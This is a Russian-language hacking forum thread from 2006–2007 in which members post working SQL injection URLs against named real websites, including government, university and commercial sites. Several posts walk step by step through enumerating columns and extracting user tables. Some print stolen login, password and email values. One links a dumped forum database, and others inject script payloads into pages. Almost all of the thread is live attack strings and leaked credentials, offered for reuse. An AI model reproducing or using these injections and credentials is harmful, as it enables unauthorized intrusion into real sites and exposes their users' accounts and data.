Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

SQL-Injection
Старый 27.12.2006, 00:14   #1
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21

SQL-Injection

1.Тема для показа найденных вами SQL-Injection на разных ресурсах.
Если найденный вами баг был где то опубликован, то сообщение будет удаляться.

2.Постим только доведённые до конца скули. Т.е. до вывода, версии, паролей, или уже до шелла.
Скули вида site.com/index.php?id=1' будут удалять


-----

Это говорит о несостоятельности наших прогеров, даже при написании такова приматства

Код:
_http://www.vanta.ru/script/catalog.php?cat=99999+UNION+SELECT+1,CHAR(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,72,105,32,50,32,71,114,97,66,66,101,114,90,32,84,101,97,77,34,41,59,60,47,115,99,114,105,112,116,62,60,104,49,62,99,114,105,108,97,122,32,105,100,105,111,84,60,47,104,49,62),3,4,5,6,7,8,9,10/*&clas=0
  Ответить с цитированием

Старый 23.01.2007, 17:36   #2
bit
 
Аватар для Scorpion
 
Scorpion вне форума
Регистрация: 31.12.2006
Сообщений: 44
Респекты: 11
В таком виде годится ?
Код:
_http://bowlingextreme.ru/rcontr-news.php?mode=view_news&id=-1+union+select+1,2,3,user(),5,6/*
  Ответить с цитированием

Старый 23.01.2007, 21:51   #3
byte
 
Аватар для cRiLaZ
 
cRiLaZ вне форума
Регистрация: 26.09.2006
Сообщений: 99
Респекты: 21
О ля ля, снова скуль на большом проекте =\

Код:
_http://www.mforum.ru/cgi-bin/job/showresume.cgi?jrID=-1'+UNION+SELECT+1,'%3Cbr%3E%3Cbr%3E%3Ch1%3EcRiLaZ%20idioT%3C/h1%3E%3Cbr%3E%3Cbr%3E%3Cnoscript%3E',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
  Ответить с цитированием

Старый 24.01.2007, 12:22   #4
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
Код:
_http://www.virusthreatcenter.com/article.aspx?articleId=-1+union+select+0,0,0,0/*
  Ответить с цитированием

Старый 24.01.2007, 17:00   #5
bit
 
Аватар для Scorpion
 
Scorpion вне форума
Регистрация: 31.12.2006
Сообщений: 44
Респекты: 11
Код:
_http://www.pct.ru/news.htm?id=-1+union+select+1,3,4,5,6/*
  Ответить с цитированием

Старый 25.01.2007, 11:22   #6
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
Некогда поля было подбирать.
Код:
_http://archives.karelia.ru/nark/projects/mosaic/viewdoc.phtml?lng=&id=-1....
  Ответить с цитированием

Старый 19.02.2007, 08:21   #7
bit
 
Аватар для Scorpion
 
Scorpion вне форума
Регистрация: 31.12.2006
Сообщений: 44
Респекты: 11
Код:
_ttp://www.sputnik-invest.ru/_content.php?Id=22&offerid=60+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*
  Ответить с цитированием

Старый 19.02.2007, 15:16   #8
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
Код:
_http://www.bamba.ru/product.asp?view=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2B%27%3A%27%2Bcast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+MEMBER+where+member_id=10)--
  Ответить с цитированием

Старый 02.04.2007, 14:56   #9
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
дохлая какая то скул
Код:
_http://eneken.ieej.or.jp/en/report/view_report.php?head_img=enrg_cnsvtn_h1.gif&category%5B%5D=2'
и
Код:
_http://www.u-tokyo.ac.jp/event/detail_e.html?id=-5927+union+select+null,null,null,TABLENAME,null,null,null,null,null,null,null,null,null,null,null+FROM+PG_TABLES+limit+1+offset+1--
  Ответить с цитированием

Старый 07.04.2007, 18:41   #10
#!/usr/bin/perl
 
Аватар для [sql]
 
[sql] вне форума
Регистрация: 07.01.2007
Сообщений: 24
Респекты: 9
Банк правовых актов Государственной Думы ФС Российской Федерации.
Код:
_http://wbase.duma.gov.ru/ntc/vdoc.asp?kl=1'
Лень было ...
  Ответить с цитированием

legionhardware.com
Старый 09.05.2007, 17:36   #11
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25
legionhardware.com

Тихо у вас тут(:
Скуль:
Код:
http://news.numizmatik.ru/read.php?news=-2566+union+select+1,2,3,4,5,6,7,8
Таблица user. По сурсам авторизации смотрим название колонок:
Код:
<input type=text name=userlogin value='' class=formtxt size=8>
<input type=password name=userpassword value='' class=formtxt size=8>
Лимит нахер не нужен, т.к. бд выводится вся сразу. Ну может только для тех у кого диал-ап(:
Код:
http://news.numizmatik.ru/read.php?news=-2566+union+select+1,2,3,concat(userlogin,0x3a,userpassword,0x3a,email),5,6,7,8+from+user
Смотрим по мылу, второй юзер, именно тот кто нам нужен. Pwd в открытом виде.

guest:b62804:administrator@numizmatik.ru

That's all.

----

Хреновый производитель игр для сотовых. Права расставлены грамотно, доступ в мускуль не root. Читалка файлов не работает. 28 полей.
Код:
http://www.namcogames.com/game_detail.php?gid=-43+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
Таблица mysql.user , но как я сказал выше - нету прав для чтения.

---

sql-inj:
Код:
http://www.legionhardware.com/document.php?id=[SQL INJ]
Код:
http://www.legionhardware.com/document.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77
77 columns.

Table: - users
Columns names: - name, password, id

Код:
http://www.legionhardware.com/document.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(name,0x3a,password,0x3a,id),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users+limit+1,1
[ Kylie:sweety:21 ]

Там же висит форум пхпББ.

http://www.legionhardware.com/Forums/

Слил БД форума: http://rapidshare.com/files/30349521..._backup.sql.gz
  Ответить с цитированием

Старый 13.05.2007, 10:53   #12
 
Аватар для d0p3_sh0w
 
d0p3_sh0w вне форума
Регистрация: 09.05.2007
Сообщений: 45
Респекты: 25
Итак приступим.
MySQL Inj.
Код:
http://pgroup.ru/?a=news&id=[INJ]
Подбираем поля.
Код:
http://pgroup.ru/?a=news&id=-1+union+select+1,2,3,4,5
Подбираем таблицу.
Код:
http://pgroup.ru/?a=news&id=-1+union+select+1,2,3,4,5+from+mysql.user
Далее подбираем имена колонок. В данном случае это user & password.
Код:
http://pgroup.ru/?a=news&id=-1+union+select+1,concat(user,0x3a,password),3,4,5+from+mysql.user
Выдаёт ошибку:
Цитата:
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_bin,IMPLICIT) for operation 'UNION'
Значит нам на помощь прийдёт aes_encrypt/decrypt. Составляем нормальный запрос:
Код:
http://pgroup.ru/?a=news&id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x55),0x55),3,4,5+from+mysql.user
Готово;)
root:79cc94fe61edd27d
  Ответить с цитированием
Юзеру d0p3_sh0w выразили Респект за этот пост:

Старый 06.06.2007, 22:23   #13
bit
 
Аватар для Emk
 
Emk вне форума
Регистрация: 06.06.2007
Сообщений: 34
Респекты: 21
Код:
_http://www.mcpies.com/about_us/view_news.php?id=13333333+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9,10,11+from+NewInTheNews/*
Код:
http://www.pikov.ru/view_news.php?id=77777+union+select+1,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),3,4,5/*
Код:
http://www.comune.casalbore.av.it/view_news.php?id=19111111+union+select+1,2,3,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),5,6/*
  Ответить с цитированием

Старый 08.06.2007, 04:09   #14
bit
 
Аватар для Emk
 
Emk вне форума
Регистрация: 06.06.2007
Сообщений: 34
Респекты: 21
Код:
http://www.catalogedituri.ro/url.php?id=4166666+union+select+1,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13/*
Код:
http://www.lmda.pe.ca/view_news.php?id=1433333+union+select+1,2,3,4,5,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),7,8,9,10,11/*
  Ответить с цитированием

Старый 17.06.2007, 01:45   #15
bit
 
Аватар для Emk
 
Emk вне форума
Регистрация: 06.06.2007
Сообщений: 34
Респекты: 21
Код:
http://www.jankrentz.com/gallery-details-ws.php?ID=677777+union+select+1,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
Код:
http://www.scoresurveyor.com/survey/s.php?ID=16888888+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4,5,6,7,8,9/*
Код:
http://www.pircher.com/resources/article.php?i=162222222+union+select+1,2,concat(VERSION(),0x3a,USER(),0x3a,DATABASE()),4/*
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 19:29



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot